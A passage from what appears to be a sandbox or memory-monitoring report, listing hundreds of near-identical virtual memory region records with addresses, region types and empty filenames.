0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8956 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8957 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8958 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8959 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8960 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8961 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8963 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8964 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8965 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8966 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8967 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8969 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8970 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8973 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8974 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8977 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8978 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8979 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8980 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8981 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8984 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8985 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8986 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8987 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8988 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8990 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8991 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8992 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8993 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8994 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8995 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8996 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8997 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8998 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8999 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9000 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9001 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9002 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9003 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9004 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9005 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9006 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9007 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9008 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9009 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9010 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9011 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9012 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9013 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9014 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9015 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9016 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9017 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9018 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9019 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9020 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9021 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9022 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9023 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9024 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9025 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9026 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9027 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9028 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9029 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9030 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9031 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9032 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9033 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9034 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9035 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9036 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9037 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9038 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9039 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9040 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9041 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9042 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9043 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9044 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9045 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9046 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9047 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9048 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9049 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9050 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9051 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9052 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9053 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9054 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9055 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9056 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9057 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9058 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9059 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9060 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9061 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9062 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9063 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9064 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9065 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9066 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9067 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9068 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9069 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9070 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9071 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9072 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9073 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9074 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9075 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9076 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9077 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9078 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9079 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9080 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9081 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9082 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9083 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9084 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9085 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9086 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9087 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9088 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9089 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9090 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9091 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9092 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9093 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9094 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9095 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9096 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9097 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9098 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9099 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9100 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9101 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9102 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9103 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9104 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9105 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9106 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9107 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9108 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9109 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9110 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9111 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9112 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9113 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9114 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9115 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9116 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9117 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9118 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9119 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9120 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9121 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9122 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9123 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9124 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9125 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9126 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9127 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9128 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9129 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9130 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9131 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9132 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9133 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9134 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9135 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9136 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9137 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9138 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9139 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9140 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9141 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9142 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9143 start_va = 0x530000 